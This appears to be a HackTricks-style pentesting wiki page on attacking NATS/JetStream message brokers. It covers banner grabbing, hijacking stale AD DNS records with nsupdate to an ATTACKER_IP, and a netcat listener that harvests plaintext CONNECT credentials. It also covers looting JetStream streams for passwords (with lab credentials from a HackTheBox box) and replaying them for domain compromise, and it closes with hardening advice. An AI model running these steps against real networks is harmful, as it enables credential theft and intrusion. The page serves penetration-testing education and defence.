4222-pentesting-nats.md (6282B)
1 --- 2 title: "4222 - Pentesting NATS / JetStream" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/4222-pentesting-nats.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/4222-pentesting-nats.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 4222 - Pentesting NATS / JetStream 14 15 ## Basic Information 16 17 **NATS** is a high-performance message bus that speaks a simple text-based protocol: the server transmits an `INFO { ... }` JSON banner immediately after TCP connect, and the client replies with a `CONNECT {"user":"USERNAME","pass":"PASSWORD",...}` frame followed by optional `PING`/`PUB`/`SUB` commands. JetStream adds persistence primitives (Streams & Consumers) on top of the same TCP port (`4222/tcp`). TLS and authentication are optional, so many internal deployments run **plaintext AUTH**. 18 19 * Default client port: **4222/tcp**; the conventional cluster-route port is **6222/tcp**, and optional HTTP monitoring commonly uses **8222/tcp**.<sup>[[2]](#references)</sup> 20 * Stock banner fields: `"version"`, `"auth_required"`, `"jetstream"`, `"max_payload"`, `"tls_required"` 21 22 ## Enumeration 23 24 ### Banner grabbing / service probes 25 26 ```bash 27 nmap -p4222 -sV --script banner TARGET 28 # Sample output 29 # 4222/tcp open nats NATS.io gnatsd 2.11.3 30 # | banner: INFO {"server_id":"NDo...","version":"2.11.3","proto":1,"auth_required":true,"jetstream":true,"max_payload":1048576} 31 ``` 32 33 The INFO frame can also be pulled manually: 34 35 ```bash 36 echo | nc HOST 4222 37 INFO {"server_id":"NCLWJ...","version":"2.11.3","auth_required":true,"jetstream":true} 38 -ERR 'Authorization Violation' 39 ``` 40 41 Install the official CLI for deeper interaction; check the current project's Go toolchain requirement before building from source.<sup>[[4]](#references)</sup> 42 43 ```bash 44 go install github.com/nats-io/natscli/nats@latest 45 nats -s nats://HOST:4222 rtt 46 ``` 47 48 Authentication failures immediately raise `nats: Authorization Violation`, so valid creds are required for any meaningful RPC. 49 50 ## Credential capture via DNS/service impersonation 51 52 - Identify stale AD DNS entries for the broker hostname (e.g. `nats-svc.domain.local`). If the record returns `NXDOMAIN`, a low-privileged domain user can recreate it thanks to default dynamic-update ACLs. See [AD DNS Records abuse](/hacktricks/windows-hardening/active-directory-methodology/ad-dns-records) for background.<sup>[[1]](#references)</sup> 53 - Register the hostname to an attacker-controlled IP: 54 55 ```bash 56 nsupdate 57 > server DC_IP 58 > update add nats-svc.domain.local 60 A ATTACKER_IP 59 > send 60 ``` 61 62 - In a lab, mirror the legitimate banner and observe whether a legacy username/password client sends a `CONNECT` frame before authenticating the server. This credential-capture condition requires plaintext NATS or TLS without server identity validation; correctly validated TLS prevents simple DNS impersonation.<sup>[[3]](#references)</sup> 63 64 ```bash 65 nc REAL_NATS 4222 | head -1 | nc -lnvp 4222 66 ``` 67 68 - As soon as an internal client resolves the hijacked name, it will emit a plaintext `CONNECT` frame containing the `user` / `pass` pair and various telemetry (client name, Go version, protocol level). Because nothing past the INFO banner is required, even `nc` is enough to harvest secrets. 69 - For longer engagements, build the official server locally and inspect the relevant version in a lab. TRACE logging can expose usernames; code instrumentation or packet capture may reveal additional authentication material when transport encryption is absent.<sup>[[4]](#references)</sup> 70 71 ```bash 72 git clone https://github.com/nats-io/nats-server 73 cd nats-server 74 go build 75 ./nats-server -V 76 ``` 77 78 ## JetStream looting & password hunting 79 80 Once any credential is recovered (e.g. `Dev_Account_A`), store it as a CLI context to avoid retyping:<sup>[[1]](#references)</sup> 81 82 ```bash 83 nats context add mirage -s nats://dc01.mirage.htb --user Dev_Account_A --password 'hx5h7F5554fP@1337!' 84 ``` 85 86 JetStream discovery usually follows this pattern: 87 88 ```bash 89 nats account info --context mirage # quotas, stream count, expiration 90 nats stream list --context mirage # names + message totals 91 nats stream info auth_logs --context mirage 92 nats stream view auth_logs --context mirage 93 ``` 94 95 Streaming teams frequently log authentication events into subjects such as `logs.auth`. If developers persist the raw JSON into a JetStream stream, the payloads may include plaintext AD usernames and passwords: 96 97 ```json 98 {"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"} 99 ``` 100 101 Retained secrets can then be replayed against Kerberos-only services using `netexec smb DC01 -u USER -p PASS -k`, enabling full domain compromise. 102 103 ## Hardening & detection 104 105 * **Enforce and validate TLS** through the server's `tls` configuration and confirm the advertised `tls_required` behavior; optionally require client certificates for mTLS. NKey/JWT authentication material is commonly distributed in `.creds` files, but NKeys/credentials are distinct from TLS client certificates.<sup>[[3]](#references)</sup> 106 * **Pinpoint who can update DNS** – delegate service records to dedicated accounts and audit Event IDs 257/252 for high-value hostnames. Combine with scavenging alerts so missing broker names cannot be silently re-claimed. 107 * **Disable credential logging**. Scrub secrets before publishing to subjects, set JetStream retention/age limits, and restrict stream-management permissions to trusted operators. 108 * **Monitor for banner anomalies** – repeated short-lived connections, authentication timeouts, or INFO banners that do not match the blessed template suggest spoofed servers. 109 110 ## References 111 112 - [1] [HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting](https://0xdf.gitlab.io/2025/11/22/htb-mirage.html) 113 - [2] [NATS documentation — Server ports](https://docs.nats.io/running-a-nats-service/nats_docker) 114 - [3] [NATS documentation — TLS configuration](https://docs.nats.io/running-a-nats-service/configuration/securing_nats/tls) 115 - [4] [nats-io/nats-server](https://github.com/nats-io/nats-server)